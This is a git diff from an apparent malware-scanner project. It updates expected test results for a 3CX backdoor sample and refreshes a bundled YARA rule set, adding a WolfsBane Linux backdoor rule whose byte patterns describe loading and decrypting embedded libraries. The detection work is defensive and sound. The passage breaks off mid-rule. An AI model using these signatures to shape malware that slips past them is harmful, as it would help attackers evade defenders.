diff --git a/tests/macOS/2023.3CX/libffmpeg.change_decrease.mdiff b/tests/macOS/2023.3CX/libffmpeg.change_decrease.mdiff
index 8cada0992..fd81737de 100644
--- a/tests/macOS/2023.3CX/libffmpeg.change_decrease.mdiff
+++ b/tests/macOS/2023.3CX/libffmpeg.change_decrease.mdiff
@@ -4,7 +4,7 @@
 
 | RISK | KEY | DESCRIPTION | EVIDENCE |
 |:--|:--|:--|:--|
-| -CRITICAL | [3P/sekoia/downloader_smooth_operator](https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/downloader_mac_smooth_operator.yar#L1-L16) | Detect the Smooth_Operator malware, by [Sekoia.io](https://github.com/SEKOIA-IO/Community) | [%s/.main_storage](https://github.com/search?q=%25s%2F.main_storage&type=code)<br>[%s/UpdateAgent](https://github.com/search?q=%25s%2FUpdateAgent&type=code) |
+| -CRITICAL | [3P/sekoia/downloader_smooth_operator](https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/downloader_mac_smooth_operator.yar#L1-L16) | Detect the Smooth_Operator malware, by [Sekoia.io](https://github.com/SEKOIA-IO/Community) | [%s/.main_storage](https://github.com/search?q=%25s%2F.main_storage&type=code)<br>[%s/UpdateAgent](https://github.com/search?q=%25s%2FUpdateAgent&type=code) |
 | -CRITICAL | [3P/sig_base/3cxdesktopapp_backdoor](https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L251-L275) | [Detects 3CXDesktopApp MacOS Backdoor component](https://www.volexity.com/blog/2023/03/30/3cx-supply-chain-compromise-leads-to-iconic-incident/), by X__Junior (Nextron Systems) | [%s/.main_storage](https://github.com/search?q=%25s%2F.main_storage&type=code)<br>[%s/UpdateAgent](https://github.com/search?q=%25s%2FUpdateAgent&type=code)<br>`$sa1`<br>`$sa2`<br>`$op1`<br>`$op2` |
 | -CRITICAL | [3P/sig_base/nk_3cx_dylib](https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L188-L214) | [Detects malicious DYLIB files related to 3CX compromise](https://www.sentinelone.com/blog/smoothoperator-ongoing-campaign-trojanizes-3cx-software-in-software-supply-chain-attack/), by Florian Roth (Nextron Systems) | `$xc1`<br>`$xc2`<br>`$xc3` |
 | -CRITICAL | [3P/sig_base/susp_xored_mozilla](https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_xor_hunting.yar#L2-L25) | [Detects suspicious single byte XORed keyword 'Mozilla/5.0' - it uses yara's XOR modifier and therefore cannot print the XOR key](https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force()), by Florian Roth | `$xof1`<br>`$fpa1`<br>`$fpa2`<br>`$fpb1`<br>`$xo1` |
diff --git a/tests/macOS/2023.3CX/libffmpeg.change_increase.mdiff b/tests/macOS/2023.3CX/libffmpeg.change_increase.mdiff
index da16ce5fa..c0b579b34 100644
--- a/tests/macOS/2023.3CX/libffmpeg.change_increase.mdiff
+++ b/tests/macOS/2023.3CX/libffmpeg.change_increase.mdiff
@@ -4,7 +4,7 @@
 
 | RISK | KEY | DESCRIPTION | EVIDENCE |
 |:--|:--|:--|:--|
-| +CRITICAL | **[3P/sekoia/downloader_smooth_operator](https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/downloader_mac_smooth_operator.yar#L1-L16)** | Detect the Smooth_Operator malware, by [Sekoia.io](https://github.com/SEKOIA-IO/Community) | [%s/.main_storage](https://github.com/search?q=%25s%2F.main_storage&type=code)<br>[%s/UpdateAgent](https://github.com/search?q=%25s%2FUpdateAgent&type=code) |
+| +CRITICAL | **[3P/sekoia/downloader_smooth_operator](https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/downloader_mac_smooth_operator.yar#L1-L16)** | Detect the Smooth_Operator malware, by [Sekoia.io](https://github.com/SEKOIA-IO/Community) | [%s/.main_storage](https://github.com/search?q=%25s%2F.main_storage&type=code)<br>[%s/UpdateAgent](https://github.com/search?q=%25s%2FUpdateAgent&type=code) |
 | +CRITICAL | **[3P/sig_base/3cxdesktopapp_backdoor](https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L251-L275)** | [Detects 3CXDesktopApp MacOS Backdoor component](https://www.volexity.com/blog/2023/03/30/3cx-supply-chain-compromise-leads-to-iconic-incident/), by X__Junior (Nextron Systems) | [%s/.main_storage](https://github.com/search?q=%25s%2F.main_storage&type=code)<br>[%s/UpdateAgent](https://github.com/search?q=%25s%2FUpdateAgent&type=code)<br>`$sa1`<br>`$sa2`<br>`$op1`<br>`$op2` |
 | +CRITICAL | **[3P/sig_base/nk_3cx_dylib](https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L188-L214)** | [Detects malicious DYLIB files related to 3CX compromise](https://www.sentinelone.com/blog/smoothoperator-ongoing-campaign-trojanizes-3cx-software-in-software-supply-chain-attack/), by Florian Roth (Nextron Systems) | `$xc1`<br>`$xc2`<br>`$xc3` |
 | +CRITICAL | **[3P/sig_base/susp_xored_mozilla](https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_xor_hunting.yar#L2-L25)** | [Detects suspicious single byte XORed keyword 'Mozilla/5.0' - it uses yara's XOR modifier and therefore cannot print the XOR key](https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force()), by Florian Roth | `$xof1`<br>`$fpa1`<br>`$fpa2`<br>`$fpb1`<br>`$xo1` |
diff --git a/tests/macOS/2023.3CX/libffmpeg.dirty.mdiff b/tests/macOS/2023.3CX/libffmpeg.dirty.mdiff
index da16ce5fa..c0b579b34 100644
--- a/tests/macOS/2023.3CX/libffmpeg.dirty.mdiff
+++ b/tests/macOS/2023.3CX/libffmpeg.dirty.mdiff
@@ -4,7 +4,7 @@
 
 | RISK | KEY | DESCRIPTION | EVIDENCE |
 |:--|:--|:--|:--|
-| +CRITICAL | **[3P/sekoia/downloader_smooth_operator](https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/downloader_mac_smooth_operator.yar#L1-L16)** | Detect the Smooth_Operator malware, by [Sekoia.io](https://github.com/SEKOIA-IO/Community) | [%s/.main_storage](https://github.com/search?q=%25s%2F.main_storage&type=code)<br>[%s/UpdateAgent](https://github.com/search?q=%25s%2FUpdateAgent&type=code) |
+| +CRITICAL | **[3P/sekoia/downloader_smooth_operator](https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/downloader_mac_smooth_operator.yar#L1-L16)** | Detect the Smooth_Operator malware, by [Sekoia.io](https://github.com/SEKOIA-IO/Community) | [%s/.main_storage](https://github.com/search?q=%25s%2F.main_storage&type=code)<br>[%s/UpdateAgent](https://github.com/search?q=%25s%2FUpdateAgent&type=code) |
 | +CRITICAL | **[3P/sig_base/3cxdesktopapp_backdoor](https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L251-L275)** | [Detects 3CXDesktopApp MacOS Backdoor component](https://www.volexity.com/blog/2023/03/30/3cx-supply-chain-compromise-leads-to-iconic-incident/), by X__Junior (Nextron Systems) | [%s/.main_storage](https://github.com/search?q=%25s%2F.main_storage&type=code)<br>[%s/UpdateAgent](https://github.com/search?q=%25s%2FUpdateAgent&type=code)<br>`$sa1`<br>`$sa2`<br>`$op1`<br>`$op2` |
 | +CRITICAL | **[3P/sig_base/nk_3cx_dylib](https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L188-L214)** | [Detects malicious DYLIB files related to 3CX compromise](https://www.sentinelone.com/blog/smoothoperator-ongoing-campaign-trojanizes-3cx-software-in-software-supply-chain-attack/), by Florian Roth (Nextron Systems) | `$xc1`<br>`$xc2`<br>`$xc3` |
 | +CRITICAL | **[3P/sig_base/susp_xored_mozilla](https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_xor_hunting.yar#L2-L25)** | [Detects suspicious single byte XORed keyword 'Mozilla/5.0' - it uses yara's XOR modifier and therefore cannot print the XOR key](https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force()), by Florian Roth | `$xof1`<br>`$fpa1`<br>`$fpa2`<br>`$fpb1`<br>`$xo1` |
diff --git a/tests/macOS/2023.3CX/libffmpeg.increase.mdiff b/tests/macOS/2023.3CX/libffmpeg.increase.mdiff
index da16ce5fa..c0b579b34 100644
--- a/tests/macOS/2023.3CX/libffmpeg.increase.mdiff
+++ b/tests/macOS/2023.3CX/libffmpeg.increase.mdiff
@@ -4,7 +4,7 @@
 
 | RISK | KEY | DESCRIPTION | EVIDENCE |
 |:--|:--|:--|:--|
-| +CRITICAL | **[3P/sekoia/downloader_smooth_operator](https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/downloader_mac_smooth_operator.yar#L1-L16)** | Detect the Smooth_Operator malware, by [Sekoia.io](https://github.com/SEKOIA-IO/Community) | [%s/.main_storage](https://github.com/search?q=%25s%2F.main_storage&type=code)<br>[%s/UpdateAgent](https://github.com/search?q=%25s%2FUpdateAgent&type=code) |
+| +CRITICAL | **[3P/sekoia/downloader_smooth_operator](https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/downloader_mac_smooth_operator.yar#L1-L16)** | Detect the Smooth_Operator malware, by [Sekoia.io](https://github.com/SEKOIA-IO/Community) | [%s/.main_storage](https://github.com/search?q=%25s%2F.main_storage&type=code)<br>[%s/UpdateAgent](https://github.com/search?q=%25s%2FUpdateAgent&type=code) |
 | +CRITICAL | **[3P/sig_base/3cxdesktopapp_backdoor](https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L251-L275)** | [Detects 3CXDesktopApp MacOS Backdoor component](https://www.volexity.com/blog/2023/03/30/3cx-supply-chain-compromise-leads-to-iconic-incident/), by X__Junior (Nextron Systems) | [%s/.main_storage](https://github.com/search?q=%25s%2F.main_storage&type=code)<br>[%s/UpdateAgent](https://github.com/search?q=%25s%2FUpdateAgent&type=code)<br>`$sa1`<br>`$sa2`<br>`$op1`<br>`$op2` |
 | +CRITICAL | **[3P/sig_base/nk_3cx_dylib](https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L188-L214)** | [Detects malicious DYLIB files related to 3CX compromise](https://www.sentinelone.com/blog/smoothoperator-ongoing-campaign-trojanizes-3cx-software-in-software-supply-chain-attack/), by Florian Roth (Nextron Systems) | `$xc1`<br>`$xc2`<br>`$xc3` |
 | +CRITICAL | **[3P/sig_base/susp_xored_mozilla](https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_xor_hunting.yar#L2-L25)** | [Detects suspicious single byte XORed keyword 'Mozilla/5.0' - it uses yara's XOR modifier and therefore cannot print the XOR key](https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force()), by Florian Roth | `$xof1`<br>`$fpa1`<br>`$fpa2`<br>`$fpb1`<br>`$xo1` |
diff --git a/third_party/yara/YARAForge/RELEASE b/third_party/yara/YARAForge/RELEASE
index 800deb1dc..caed742bd 100644
--- a/third_party/yara/YARAForge/RELEASE
+++ b/third_party/yara/YARAForge/RELEASE
@@ -1 +1 @@
-20250608
+20250615
diff --git a/third_party/yara/YARAForge/yara-rules-full.yar b/third_party/yara/YARAForge/yara-rules-full.yar
index ac5c66c60..7df95bcd3 100644
--- a/third_party/yara/YARAForge/yara-rules-full.yar
+++ b/third_party/yara/YARAForge/yara-rules-full.yar
@@ -12,26 +12,26 @@
  * Force Exclude Importance Level: 0
  * Minimum Age (in days): 0
  * Minimum Score: 40
- * Creation Date: 2025-06-08
- * Number of Rules: 11324
+ * Creation Date: 2025-06-15
+ * Number of Rules: 11323
  * Skipped: 0 (age), 223 (quality), 7 (score), 0 (importance)
  */
 
+import "elf"
 import "pe"
 import "dotnet"
-import "console"
 import "hash"
 import "math"
-import "elf"
+import "console"
 
 
 /*
  * YARA Rule Set
  * Repository Name: ReversingLabs
  * Repository: https://github.com/reversinglabs/reversinglabs-yara-rules/
- * Retrieval Date: 2025-06-08
- * Git Commit: d8f40bbab4baaa32894019b43236afe5d9109140
- * Number of Rules: 1228
+ * Retrieval Date: 2025-06-15
+ * Git Commit: e3267cfb8a5a81fad12e7e7e3112ac574086046a
+ * Number of Rules: 1230
  * Skipped: 0 (age), 0 (quality), 0 (score), 0 (importance)
  *
  *
@@ -57,9067 +57,33732 @@ LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
 OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
 SOFTWARE.
  */
-
-rule REVERSINGLABS_Cert_Blocklist_05E2E6A4Cd09Ea54D665B075Fe22A256 : INFO FILE
-{
-	meta:
-		description = "The digital certificate has leaked."
-		author = "ReversingLabs"
-		id = "824c6b2f-081a-5f38-b949-d802f59e6ced"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L27-L43"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "43da21d9c7ae9bfcc7fe4ee69f9d46cbce1954785d56c1d424b36deb8afe592e"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
-
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "*.google.com" and pe.signatures [ i ] . serial == "05:e2:e6:a4:cd:09:ea:54:d6:65:b0:75:fe:22:a2:56" and 1308182400 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_77019A082385E4B73F569569C9F87Bb8 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "4046a31b-d7c8-5c63-b5b2-2179b0817b03"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L45-L61"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "8613986005bdd30d92e633fa2058be5c43f1c530b9dc6d80ec953f12f6d66ce7"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
-
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AND LLC" and pe.signatures [ i ] . serial == "77:01:9a:08:23:85:e4:b7:3f:56:95:69:c9:f8:7b:b8" and 1308182400 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_4F2Ef29Ca5F96E5777B82C62F34Fd3A6 : INFO FILE
+rule REVERSINGLABS_Linux_Backdoor_Wolfsbane : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "The digital certificate has leaked."
+		description = "Yara rule that detects WolfsBane backdoor."
 		author = "ReversingLabs"
-		id = "6cfb6ae0-8eba-503b-8bb7-ac72746d9aa2"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "07b96e74-8ad1-5400-a23c-c14fea78ecdd"
+		date = "2025-03-17"
+		modified = "2025-03-17"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L63-L79"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "e8f27c4a72f416a16acabb1de606fdde7dc694256809fdb952a25313dda0d34e"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/backdoor/Linux.Backdoor.WolfsBane.yara#L1-L124"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "c2bc992375bfa989c2a18a52e09c551cd6dfefda8fb96e7af4dabfead76e784f"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Backdoor"
+		tc_detection_name = "WolfsBane"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bit9, Inc" and pe.signatures [ i ] . serial == "4f:2e:f2:9c:a5:f9:6e:57:77:b8:2c:62:f3:4f:d3:a6" and 1342051200 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_7Cc1Db2Ad0A290A4Bfe7A5F336D6800C : INFO FILE
-{
-	meta:
-		description = "The digital certificate has leaked."
-		author = "ReversingLabs"
-		id = "89bc7c99-dea2-50ce-a0d2-4292c14d049e"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L81-L97"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "c9f91edb525a02041bc20dff25ec58323f8fabd4d2a2eca63238ecb10ccef2a6"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$load_embedded_library = {
+            41 57 41 56 41 55 41 54 49 89 FC 55 53 48 89 F3 48 83 EC ?? 48 8B 05 ?? ?? ?? ?? 48
+            C7 47 ?? ?? ?? ?? ?? C7 47 ?? ?? ?? ?? ?? 48 C7 47 ?? ?? ?? ?? ?? 48 C7 47 ?? ?? ??
+            ?? ?? C7 47 ?? ?? ?? ?? ?? 48 83 C0 ?? 48 C7 47 ?? ?? ?? ?? ?? 48 89 07 48 8D 47 ??
+            48 89 47 ?? 48 89 47 ?? 48 8D 47 ?? 48 89 47 ?? 48 89 47 ?? 48 8B 06 48 39 46 ?? 0F
+            84 ?? ?? ?? ?? 4C 8B 3D ?? ?? ?? ?? BF ?? ?? ?? ?? 49 89 E5 49 8D 47 ?? 48 89 44 24
+            ?? E8 ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 48 89 58 ?? 48 8B 1D ?? ?? ?? ?? 48 C7 40 ??
+            ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 48 89 44 24 ?? 48 83 C2 ?? 48 89 44 24 ?? 48 C7 44
+            24 ?? ?? ?? ?? ?? 48 89 10 48 8D 43 ?? 48 C7 44 24 ?? ?? ?? ?? ?? 48 C7 44 24 ?? ??
+            ?? ?? ?? 48 89 04 24 48 8D 43 ?? 48 89 44 24 ?? 48 89 E0 48 03 03 48 8B 50 ?? 48 39
+            50 ?? 0F 84 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 4C 8D 74 24 ?? 48 8D 54 24 ?? 4C 89 F7
+            48 8B 70 ?? 31 C0 80 3E ?? 0F 94 C0 48 01 C6 E8 ?? ?? ?? ?? 48 8B 04 24 4C 89 ED 48
+            03 68 ?? 48 8B 7D ?? 48 3B 7D ?? 0F 84 ?? ?? ?? ?? 48 85 FF 0F 84 ?? ?? ?? ?? 4C 89
+            F6 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 83 C0 ?? 48 89 45 ?? 4C 89 F7 E8 ?? ?? ?? ?? 48 8D
+            43 ?? 48 8B 7C 24 ?? 48 89 04 24 49 8D 47 ?? 48 85 FF 48 89 44 24 ?? 74 ?? 48 8B 07
+            FF 50 ?? 48 8B 6C 24 ?? 48 8B 5C 24 ?? 48 39 DD 74 ?? 66 0F 1F 44 00 ?? 48 89 DF E8
+            ?? ?? ?? ?? 48 83 C3 ?? 48 39 DD 75 ?? 48 8B 6C 24 ?? 48 85 ED 74 ?? 48 89 EF E8 ??
+            ?? ?? ?? 48 83 C4 ?? 4C 89 E0 5B 5D 41 5C 41 5D 41 5E 41 5F C3
+        }
+		$decrypt_embedded_library_1 = {
+            41 57 41 56 41 55 41 54 55 48 89 F5 53 48 89 FB 48 81 EC ?? ?? ?? ?? 48 8B 77 ?? 48
+            8D 84 24 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 48 89 C7 48 89 44 24 ?? E8 ?? ?? ?? ??
+            48 8B 84 24 ?? ?? ?? ?? 48 83 78 ?? ?? 0F 84 ?? ?? ?? ?? 48 8B 45 ?? 48 39 45 ?? 0F
+            84 ?? ?? ?? ?? 4C 8D A4 24 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 48 8D 35 ?? ?? ?? ??
+            4C 89 E7 E8 ?? ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? 48 8B 74 24 ?? 4C 89 E2 48 89 C7 48
+            89 44 24 ?? E8 ?? ?? ?? ?? 4C 89 E7 E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 39 84
+            24 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 4C 8D BC
+            24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ??
+            ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 83 C0 ?? 48 83 C2 ?? 48 89 84 24 ?? ?? ??
+            ?? 48 89 84 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 4C 8B 23 48 89 94 24 ?? ?? ?? ??
+            4C 89 E7 E8 ?? ?? ?? ?? 49 8D 7F ?? 48 89 C2 4C 89 E6 E8 ?? ?? ?? ?? 4C 8B 63 ?? 4C
+            89 E7 E8 ?? ?? ?? ?? 49 8D 7F ?? 48 89 C2 4C 89 E6 E8 ?? ?? ?? ?? 48 8B 5B ?? 48 89
+            DF E8 ?? ?? ?? ?? 49 8D 7F ?? 48 89 C2 48 89 DE E8 ?? ?? ?? ?? 49 8D 7F ?? 48 89 EE
+            E8 ?? ?? ?? ?? 48 8D 9C 24 ?? ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? 4C 89 FE 48 C7 84 24
+            ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 DF 48 C7 84 24 ??
+            ?? ?? ?? ?? ?? ?? ?? 48 89 44 24 ?? E8 ?? ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? 48 89 DE
+            48 89 C7 48 89 44 24 ?? E8 ?? ?? ?? ?? 48 8B BC 24 ?? ?? ?? ?? 48 85 FF 74 ?? E8 ??
+            ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 48 8D 35 ?? ?? ?? ?? 48 89
+            C7 48 89 44 24 ?? E8 ?? ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? 48 89 C7 48 89 44 24 ?? E8
+        }
+		$decrypt_embedded_library_2 = {
+            48 8D 7C 24 ?? 49 89 F9 0F 1F 84 00 ?? ?? ?? ?? 89 CA 89 C8 83 C1 ?? C1 FA ?? F7 FB
+            48 63 D2 0F B6 04 16 41 88 01 49 83 C1 ?? 81 F9 ?? ?? ?? ?? 75 ?? 48 8D B5 ?? ?? ??
+            ?? 48 89 E8 31 D2 66 90 0F B6 18 44 0F B6 0F 48 83 C7 ?? 0F B6 CB 41 8D 0C 09 8D 14
+            11 41 89 D3 41 C1 FB ?? 41 C1 EB ?? 44 01 DA 81 E2 ?? ?? ?? ?? 44 29 DA 48 63 CA 83
+            C2 ?? 44 0F B6 8C 0C ?? ?? ?? ?? 44 88 08 48 83 C0 ?? 88 9C 0C ?? ?? ?? ?? 48 39 F0
+            75 ?? 4D 29 C2 45 85 D2 0F 8E ?? ?? ?? ?? 41 83 EA ?? 31 C0 31 D2 4F 8D 54 10 ?? 66
+            0F 1F 84 00 ?? ?? 00 00 83 C2 ?? 89 D1 C1 F9 ?? C1 E9 ?? 01 CA 81 E2 ?? ?? ?? ?? 29
+            CA 48 63 CA 83 C2 ?? 0F B6 BC 0C ?? ?? ?? ?? 40 0F B6 DF 8D 04 03 89 C6 C1 FE ?? C1
+            EE ?? 01 F0 25 ?? ?? ?? ?? 29 F0 48 63 F0 83 C0 ?? 44 0F B6 8C 34 ?? ?? ?? ?? 44 88
+            8C 0C ?? ?? ?? ?? 40 88 BC 34 ?? ?? ?? ?? 02 9C 0C ?? ?? ?? ?? 0F B6 DB 0F B6 8C 1C
+            ?? ?? ?? ?? 41 30 08 49 83 C0 ?? 4D 39 D0 75 ?? B9 ?? ?? ?? ?? 31 C0 48 89 EF F3 48
+            AB 48 8B BC 24 ?? ?? ?? ?? 48 85 FF 74 ?? E8 ?? ?? ?? ?? 48 8B B4 24 ?? ?? ?? ?? 48
+            8B 7C 24 ?? E8 ?? ?? ?? ?? 48 8B 7C 24 ?? E8 ?? ?? ?? ?? 48 8B BC 24 ?? ?? ?? ?? 48
+            8B 84 24 ?? ?? ?? ?? 48 29 F8 48 C1 F8 ?? 48 83 F8 ?? 74 ?? 48 8B BC 24 ?? ?? ?? ??
+            48 85 FF 74 ?? E8 ?? ?? ?? ?? 4C 89 FF E8 ?? ?? ?? ?? 48 8B 7C 24 ?? E8 ?? ?? ?? ??
+            48 8B 7C 24 ?? E8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5B 5D 41 5C 41 5D 41 5E 41 5F C3
+        }
+		$remove_backdoor_p1 = {
+            41 57 48 8D 35 ?? ?? ?? ?? 41 56 41 55 41 54 55 53 48 81 EC ?? ?? ?? ?? 48 8D AC 24
+            ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 48 8D 9C 24 ?? ?? ?? ??
+            48 89 DF E8 ?? ?? ?? ?? 48 89 EE 48 89 DF E8 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 48
+            89 C6 48 89 D7 48 89 54 24 ?? E8 ?? ?? ?? ?? 48 8B B4 24 ?? ?? ?? ?? 48 89 DF E8 ??
+            ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 4C 8B 35 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89
+            EF 49 8D 76 ?? E8 ?? ?? ?? ?? 48 8D 9C 24 ?? ?? ?? ?? 48 89 EE 48 89 DF E8 ?? ?? ??
+            ?? 48 8D 84 24 ?? ?? ?? ?? 48 89 DE 48 89 C7 48 89 44 24 ?? E8 ?? ?? ?? ?? 48 89 DF
+            E8 ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 2B 84 24 ?? ?? ??
+            ?? C7 44 24 ?? ?? ?? ?? ?? 48 83 F8 ?? 0F 84 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 49
+            8D 76 ?? 48 89 EF E8 ?? ?? ?? ?? 48 8D 9C 24 ?? ?? ?? ?? 48 89 EE 48 89 DF E8 ?? ??
+            ?? ?? 4C 8D A4 24 ?? ?? ?? ?? 48 89 DE 4C 89 E7 E8 ?? ?? ?? ?? 48 8B 7C 24 ?? 4C 89
+            E6 E8 ?? ?? ?? ?? 48 8B BC 24 ?? ?? ?? ?? 48 85 FF 74 ?? E8 ?? ?? ?? ?? 48 89 DF E8
+            ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 2B 84 24
+        }
+		$remove_backdoor_p2 = {
+            45 31 FF 48 83 F8 ?? 0F 84 ?? ?? ?? ?? 4C 8D A4 24 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ??
+            ?? 48 8D 35 ?? ?? ?? ?? 4C 89 E7 E8 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 8D 94 24
+            ?? ?? ?? ?? 48 8D 35 ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 48 8D 9C 24 ?? ?? ?? ?? 48
